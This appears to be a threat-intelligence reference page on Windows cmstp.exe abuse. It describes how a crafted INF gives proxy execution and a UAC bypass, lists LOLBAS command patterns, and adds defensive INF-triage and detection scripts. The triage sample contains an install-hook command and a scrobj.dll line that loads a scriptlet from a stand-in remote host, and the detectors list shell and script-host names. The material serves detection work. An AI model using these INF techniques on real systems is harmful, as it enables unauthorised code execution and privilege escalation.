Process

unknown

cmstp.exe

cmstp.exe is the Connection Manager Profile Installer, meant to install network connection profiles from an INF file. It is rarely used today. Attackers abuse it because a crafted INF can make this signed, auto-elevating Microsoft binary run arbitrary commands, which gives them both proxy execution and a User Account Control bypass from a single INF.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS
  • cmstp.exe /ni /s {PATH_ABSOLUTE:.inf} · Execute · Execute code hidden within an INF file. Download and run scriptlets from the internet.
  • cmstp.exe /ni /s {REMOTEURL:.inf} · AWL Bypass · Execute code hidden within an INF file. Execute code directly from the internet.
  • cmstp.exe /nf · Execute · Proxy execution of a malicious DLL via registry modification.

Indicators

Hashes

Not observed.

Analysis

About this process

cmstp.exe installs or removes Connection Manager service profiles described in an INF file. Besides the profile itself, the INF's [DefaultInstall] section can name command sections (RunPreSetupCommands, RunPostSetupCommands) and OCX registration entries (RegisterOCXs, UnRegisterOCXs) that cmstp acts on during installation, and that is the mechanism attackers repurpose: a crafted INF tells cmstp to run an embedded command or to load scrobj.dll against a remote scriptlet. The genuine binary lives at C:\Windows\System32\cmstp.exe, with a 32-bit copy under SysWOW64.

Legitimately, cmstp is used to deploy VPN or dial-up connection profiles, which is uncommon on modern systems. The INF it is given, and where that INF came from, are what give an instance meaning.
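When an INF is recovered from a suspicious cmstp instance, the first question is which of its install hooks carry commands. The following triage script is an added example, not code from the original page: it parses the INF, follows each of the documented execution hooks to the section it names, and flags content that does not belong in a profile install. The INF text is constructed for the demo (the scriptlet URL uses a reserved example domain); the section and key names are the real Connection Manager ones.

```python
"""Triage a Connection Manager INF for the command-running sections cmstp.exe abuses.

Added example, not code from the original page. The INF text is constructed for
the demo; the section and key names are the documented Connection Manager ones.
"""
import re
from typing import Dict, List, Tuple

# Keys (under [DefaultInstall] in a CM profile) whose value names a section that
# cmstp.exe acts on during installation. These are the hooks a crafted INF uses.
EXEC_KEYS = {
    "runpresetupcommands": "command lines run before setup, under cmstp's own (possibly elevated) token",
    "runpostsetupcommands": "command lines run after setup",
    "registerocxs": "DLL/OCX loaded and its DllRegisterServer called",
    "unregisterocxs": "DLL/OCX loaded and its DllUnregisterServer called (scrobj.dll + remote .sct pattern)",
}

# Content that has no business in a profile install: URLs, UNC paths, interpreters, scriptlets.
SUSPICIOUS = re.compile(
    r"(https?://|\\\\[^\\]+\\|scrobj\.dll|powershell|cmd\.exe|mshta|rundll32|regsvr32|\.sct\b)",
    re.IGNORECASE,
)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Split INF text into {section (lower-cased): [non-blank, non-comment lines]}."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.match(r"^\[(.+?)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def key_value(line: str) -> Tuple[str, str]:
    key, _, value = line.partition("=")
    return key.strip().lower(), value.strip()


def triage(text: str) -> List[dict]:
    """Follow every execution hook to the section it names and report each line found there."""
    sections = parse_inf(text)
    findings: List[dict] = []
    for sec_name, lines in sections.items():
        for line in lines:
            key, value = key_value(line)
            if key not in EXEC_KEYS:
                continue
            # A hook may list several sections, comma separated.
            for target in (t.strip().lower() for t in value.split(",") if t.strip()):
                for cmd in sections.get(target, []):
                    findings.append({
                        "via": f"[{sec_name}] {key} -> [{target}]",
                        "command": cmd,
                        "why": EXEC_KEYS[key],
                        "suspicious": bool(SUSPICIOUS.search(cmd)),
                    })
    return findings


def verdict(findings: List[dict]) -> str:
    if not findings:
        return "no install-time commands"
    return "suspicious" if any(f["suspicious"] for f in findings) else "review"


# Constructed sample: a profile whose install hooks point at an interpreter and a remote scriptlet.
SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection
UnRegisterOCXs=UnRegisterOCXSection

[RunPreSetupCommandsSection]
; constructed: an arbitrary command where only profile setup steps belong
cmd.exe /c whoami

[UnRegisterOCXSection]
; constructed: scrobj.dll pointed at a scriptlet on a reserved example host
%11%\scrobj.dll,NI,https://example.invalid/profile.sct

[Strings]
ServiceName="Demo VPN"
"""

if __name__ == "__main__":
    found = triage(SAMPLE_INF)
    for f in found:
        print(("!! " if f["suspicious"] else "   ") + f["via"] + ": " + f["command"])
    print("verdict:", verdict(found))
```

A genuine VPN profile usually has no RunPreSetupCommands section at all, so the useful output is not only the suspicious flag but the fact that any install-time command exists; run the script over the INF path taken from the cmstp command line.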

Security notes

cmstp.exe is a system-binary proxy (T1218.003). A crafted INF makes the signed binary execute an embedded command or load scrobj.dll against a remote scriptlet, so an attacker runs cmstp /s evil.inf (/s suppresses the installer UI) to have a trusted Microsoft process run their code past application-control rules that trust Microsoft-signed binaries. The same INF mechanism bypasses User Account Control (T1548.002): cmstp.exe is marked auto-elevate in its manifest, so from a medium-integrity administrator session it starts at high integrity without a consent prompt, and the commands the INF runs during setup inherit that elevated token.

Connection-profile installation is rare, so cmstp running at all is notable, and an INF from a temp, download, or remote path, or a parent like an Office application, marks it as abuse rather than network configuration.

Anomaly signals
  • An INF on the command line from a user-writable path or a remote location · high
  • Parent is an Office application, a script host, cmd.exe, or powershell.exe · high
  • cmstp spawning a shell or making outbound network connections · high
  • Run on a host that does not deploy connection profiles · med
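The four signals above are straightforward to turn into detection logic. The script below is an added example, not code from the original page: it runs the signals over constructed process-create and network-connect records shaped like Sysmon fields (the field names and the allowlist of profile-deploying hosts are assumptions for the demo), distinguishing a quiet, expected install from the abuse chain the page describes.

```python
"""Score cmstp.exe process and network telemetry against the anomaly signals above.

Added example, not code from the original page. Events are constructed to look
like Sysmon process-create and network-connect records; field names are assumed.
"""
import ipaddress
import re
from typing import Iterable, List, Set

# Signal 1: INF sourced from somewhere a standard user can write, or from a URL / UNC share.
USER_WRITABLE = re.compile(r"(\\users\\|\\temp\\|\\appdata\\|\\downloads\\|\\programdata\\|%temp%|%appdata%)", re.I)
REMOTE = re.compile(r"(https?://|\\\\)", re.I)
# Signal 2: parents that deploy documents and scripts, not connection profiles.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Signal 3: children a profile installer never needs, and outbound traffic beyond RFC1918 space.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def extract_inf(cmdline: str):
    """Return the .inf argument, honouring quotes around paths that contain spaces."""
    m = re.search(r'"([^"]+\.inf)"|(\S+\.inf)\b', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def is_internal(dst: str) -> bool:
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:  # a hostname rather than an address: treat as external
        return False
    return any(ip in net for net in INTERNAL_NETS)


def alert(e: dict, signal: str, severity: str, detail: str) -> dict:
    return {"host": e["host"], "signal": signal, "severity": severity, "detail": detail}


def evaluate(events: Iterable[dict], profile_hosts: Set[str]) -> List[dict]:
    """Apply the four signals; profile_hosts are the machines expected to install profiles (signal 4)."""
    alerts: List[dict] = []
    for e in events:
        image = basename(e["image"])
        if e["type"] == "network":
            if image == "cmstp.exe" and not is_internal(e["dst"]):
                alerts.append(alert(e, "cmstp_outbound", "high", f'{e["dst"]}:{e["dport"]}'))
            continue
        parent = basename(e["parent"])
        if image == "cmstp.exe":
            inf = extract_inf(e["cmdline"])
            if inf and (USER_WRITABLE.search(inf) or REMOTE.match(inf)):
                alerts.append(alert(e, "inf_untrusted_source", "high", inf))
            if parent in SUSPICIOUS_PARENTS:
                alerts.append(alert(e, "suspicious_parent", "high", parent))
            if e["host"].lower() not in profile_hosts:
                alerts.append(alert(e, "host_not_expected", "med", e["host"]))
        elif parent == "cmstp.exe" and image in SHELLS:
            alerts.append(alert(e, "cmstp_spawned_shell", "high", image))
    return alerts


# Constructed telemetry: one expected deployment, then an abuse chain on two workstations.
EVENTS = [
    {"type": "process", "host": "vpn-build01", "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r'cmstp.exe /s "C:\Program Files\Corp VPN\corpvpn.inf"',
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"type": "process", "host": "ws-0421", "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\update.inf",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"type": "process", "host": "ws-0421", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami", "parent": r"C:\Windows\System32\cmstp.exe"},
    {"type": "network", "host": "ws-0421", "image": r"C:\Windows\System32\cmstp.exe",
     "dst": "203.0.113.10", "dport": 443},
    {"type": "process", "host": "ws-0777", "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /ni /s \\203.0.113.10\share\p.inf",
     "parent": r"C:\Windows\System32\cmd.exe"},
]
PROFILE_HOSTS = {"vpn-build01"}

if __name__ == "__main__":
    for a in evaluate(EVENTS, PROFILE_HOSTS):
        print(f'{a["severity"]:4} {a["host"]:12} {a["signal"]:22} {a["detail"]}')
```

The msiexec-driven install on the build host produces no alert at all, which is the point of the host allowlist: cmstp is rare enough that the medium signal alone is worth a ticket on any machine outside it, and the high signals stack on the workstation where the INF came from a temp path and Office was the parent.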

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.
